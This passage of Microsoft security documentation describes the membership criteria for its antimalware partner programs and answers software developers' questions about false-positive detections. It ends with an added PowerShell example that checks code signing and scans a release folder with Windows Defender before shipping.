our data to help assess the impact of policy changes or to help shut down malicious activity.
Microsoft is committed to continuous improvement to help reduce the impact of malware on customers. By
sharing malware-related information, Microsoft enables members of this community to work towards better
protection for customers.

Becoming a member of VIA


Microsoft has well-defined, objective, measurable, and tailored membership criteria for prospective members of
the Virus Information Alliance (VIA). The criteria are designed to ensure that Microsoft is able to work with security
software providers, security service providers, antimalware testing organizations, and other organizations involved
in the fight against cybercrime to protect a broad range of customers.
Members will receive information to facilitate effective malware detection, deterrence, and eradication. This
includes technical information on malware as well as metadata on malicious activity. Information shared through
VIA is governed by the VIA membership agreement and a Microsoft non-disclosure agreement, where applicable.
VIA has an open enrollment for potential members.
Initial selection criteria
To be eligible for VIA, your organization must:
1. Be willing to sign a non-disclosure agreement with Microsoft.
2. Fit into one of the following categories:
   - Your organization develops antimalware technology that can run on Windows, and your organization's
     product is commercially available.
   - Your organization provides security services to Microsoft customers or for Microsoft products.
   - Your organization publishes antimalware testing reports on a regular basis.
   - Your organization has a research or response team dedicated to fighting malware to protect your
     organization, your customers, or the general public.
3. Be willing to sign and adhere to the VIA membership agreement.
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Microsoft Virus Initiative
4/8/2019 • 2 minutes to read

The Microsoft Virus Initiative (MVI) helps organizations to get their products working and integrated with
Windows.
MVI members receive access to Windows APIs (such as those used by Windows Defender Antivirus) and
other technologies, including IOAV, AMSI (the Antimalware Scan Interface) and Cloud Files; malware telemetry and
samples; and invitations to security-related events and conferences.
MVI requires members to develop and own antimalware technology and to be present in the antimalware industry
community.

Join MVI
A request for membership is made by an individual as a representative of an organization that develops and
produces antimalware or antivirus technology.
Initial selection criteria
Your organization must meet the following eligibility requirements to qualify for the MVI program:
1. Offer an antimalware or antivirus product that is one of the following:
   - Your organization's own creation.
   - Developed by using an SDK (engine and other components) from another MVI partner company, to which
     your organization adds a custom UI and/or other functionality.
2. Have your own malware research team, unless you build a product based on an SDK.
3. Be active and have a positive reputation in the antimalware industry. Your organization must be:
   - Certified through independent testing by an industry standard organization such as ICSA Labs, West
     Coast Labs, PCSL IT Consulting Institute, or SKD Labs.
   - Active in the antimalware industry. For example, it participates in industry conferences or is reviewed in
     an industry standard report such as AV-Comparatives, OPSWAT or Gartner.
4. Be willing to sign a non-disclosure agreement (NDA) with Microsoft.
5. Be willing to sign a program license agreement.
6. Be willing to adhere to program requirements for antimalware apps. These requirements define the
   behavior of antimalware apps necessary to ensure proper interaction with Windows.
7. Submit your app to Microsoft for periodic performance testing.
Apply now
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Coordinated Malware Eradication
4/5/2019 • 2 minutes to read

Coordinated Malware Eradication (CME) aims to bring organizations in cybersecurity and in other industries
together to change the game against malware. While the cybersecurity industry today is effective at disrupting
malware families through individual efforts, those disruptions rarely lead to eradication, because malware authors
quickly adapt their tactics to survive.
CME calls for organizations to pool their tools, information and actions to drive coordinated campaigns against
malware. The ultimate goal is to drive efficient and long lasting results for better protection of our collective
communities, customers, and businesses.

Combining our tools, information, and actions


Diversity of participation across industries and disciplines, extending beyond cybersecurity, makes eradication
campaigns even stronger across the malware lifecycle. For instance, while security vendors, computer emergency
response/readiness teams (CERTs), and Internet service providers (ISPs) can contribute with malware telemetry,
online businesses can identify fraudulent behavior and law enforcement agencies can drive legal action.
In addition to telemetry and analysis data, Microsoft is planning to contribute cloud-based scalable storage and
computing horsepower with the necessary big data analysis tools built-in to these campaigns.

Coordinated campaigns for lasting results


Organizations participating in the CME effort work together to help eradicate selected malware families by
contributing their own telemetry data, expertise, tools, and other resources. These organizations operate under a
campaign umbrella with clearly defined end goals and metrics. Any organization or member can initiate a
campaign and invite others to join it. The members then have the option to accept or decline the invitations they
receive.

Join the effort


Any organization that is involved in cybersecurity and antimalware, or that is interested in fighting cybercrime, can
participate in CME campaigns by enrolling in the Virus Information Alliance (VIA) program. VIA membership ensures
that everyone agrees to use the information and tools available for campaigns only for their intended purpose (that
is, the eradication of malware).
If your organization meets the VIA criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Information for developers
4/5/2019 • 2 minutes to read

Learn about the common questions we receive from software developers and get other developer resources such
as detection criteria and file submissions.

In this section
Software developer FAQ: Provides answers to common questions we receive from software developers.
Developer resources: Provides information about how to submit files, detection criteria, and how to check your
software against the latest Security intelligence and cloud protection from Microsoft.
Software developer FAQ
4/5/2019 • 2 minutes to read

This page provides answers to common questions we receive from software developers. For general guidance
about submitting malware or incorrectly detected files, read the submission guide.

Does Microsoft accept files for a known list or false-positive prevention program?
No. We do not accept these requests from software developers. Signing your program's files in a consistent
manner, with a digital certificate issued by a trusted root authority, helps our research team quickly identify the
source of a program and apply previously gained knowledge. In practice, "consistent" means every binary in a
release (executables, DLLs, drivers, installers) carries a valid signature from the same publisher certificate. In some
cases, this might result in your program being quickly added to the known list or, far less frequently, in adding your
digital certificate to a list of trusted publishers.

How do I dispute the detection of my program?


Submit the file in question as a software developer. Wait until your submission has a final determination.
If you're not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.

Why is Microsoft asking for a copy of my program?


This can help us with our analysis. Participants of the Microsoft Active Protection Service (MAPS) may
occasionally receive these requests. The requests will stop once our systems have received and processed the file.

Why does Microsoft classify my installer as a software bundler?


Your installer offers, or bundles, a program that Microsoft classifies as unwanted software. You can review the
criteria we use to check applications for behaviors that are considered unwanted.

Why is the Windows Firewall blocking my program?


This is not related to Windows Defender Antivirus or other Microsoft antimalware. You can find out more about
Windows Firewall from the Microsoft Developer Network.

Why does Windows Defender SmartScreen say my program is not commonly downloaded?
This is not related to Windows Defender Antivirus or other Microsoft antimalware. You can find out more from
the SmartScreen website.
Software developer resources
4/5/2019 • 2 minutes to read

Concerned about the detection of your software? If you believe that your application or program has been
incorrectly detected by Microsoft security software, submit the relevant files for analysis.
Check out the following resources for information on how to submit and view submissions:
Submit files
View your submissions

Additional resources
Detection criteria
To objectively identify malware and unwanted software, Microsoft applies a set of criteria for evaluating
malicious or potentially harmful code.
Developer questions
Find more guidance about the file submission and detection dispute process in our FAQ for software developers.
Scan your software
Use Windows Defender Antivirus to check your software against the latest Security intelligence and cloud
protection from Microsoft before you ship it, so that a detection surfaces on your build machine rather than on a
customer's.
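The following PowerShell script is an added example, not code from the Microsoft page. It ties together the two
developer-facing checks above: the FAQ's advice to sign every file consistently with one publisher certificate, and
the "Scan your software" step of checking a build against current Security intelligence and cloud protection. It
assumes an elevated PowerShell session on Windows 10 with the built-in Defender module, and the release folder
path is a placeholder you would replace with your own build output.

```powershell
# Added example (not part of the original page). Assumes Windows 10 with Windows Defender
# Antivirus active and an elevated PowerShell session. $ReleasePath is an assumed placeholder.
param(
    [string]$ReleasePath = 'C:\build\release'   # assumption: your build output folder
)

# 1. Refresh Security intelligence so the scan uses the latest definitions.
Update-MpSignature

# 2. Make sure cloud-delivered protection (MAPS) is on, so the check exercises the same
#    cloud classification that customer machines use.
$prefs = Get-MpPreference
if ($prefs.MAPSReporting -eq 0 -or $prefs.DisableBlockAtFirstSeen) {
    Write-Warning 'Cloud protection / MAPS reporting is off; enabling it for this check.'
    Set-MpPreference -MAPSReporting Advanced -DisableBlockAtFirstSeen $false
}

# 3. Verify that every PE file and installer is validly Authenticode-signed, and that
#    all of them use the same certificate (the FAQ's "consistent manner" point).
$files = Get-ChildItem -Path $ReleasePath -Recurse -Include *.exe, *.dll, *.sys, *.msi
$sigs = foreach ($f in $files) {
    $s = Get-AuthenticodeSignature -FilePath $f.FullName
    [pscustomobject]@{
        File       = $f.FullName
        Status     = $s.Status                       # Valid, NotSigned, HashMismatch, ...
        Publisher  = if ($s.SignerCertificate) { $s.SignerCertificate.Subject } else { '<unsigned>' }
        Thumbprint = if ($s.SignerCertificate) { $s.SignerCertificate.Thumbprint } else { '' }
    }
}
$bad = $sigs | Where-Object { $_.Status -ne 'Valid' }
if ($bad) {
    $bad | Format-Table -AutoSize
    Write-Warning "$(@($bad).Count) file(s) are unsigned or have an invalid signature."
}
$certs = @($sigs | Where-Object Thumbprint | Select-Object -ExpandProperty Thumbprint -Unique)
if ($certs.Count -gt 1) {
    Write-Warning "Release is signed with $($certs.Count) different certificates; use one publisher certificate."
}

# 4. Scan only the release folder and list anything Defender flagged inside it.
Start-MpScan -ScanType CustomScan -ScanPath $ReleasePath
Get-MpThreatDetection |
    Where-Object { $_.Resources -match [regex]::Escape($ReleasePath) } |
    Select-Object ThreatID, InitialDetectionTime, Resources |
    Format-Table -AutoSize
```

Run it on the build machine after signing and before publishing. A non-empty table from the last step means the
file should be submitted for analysis as a software developer, per the FAQ, rather than shipped; a warning from
step 3 means the signing step itself needs fixing first, since inconsistent or missing signatures remove the
shortcut the FAQ describes for recognizing a known publisher.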
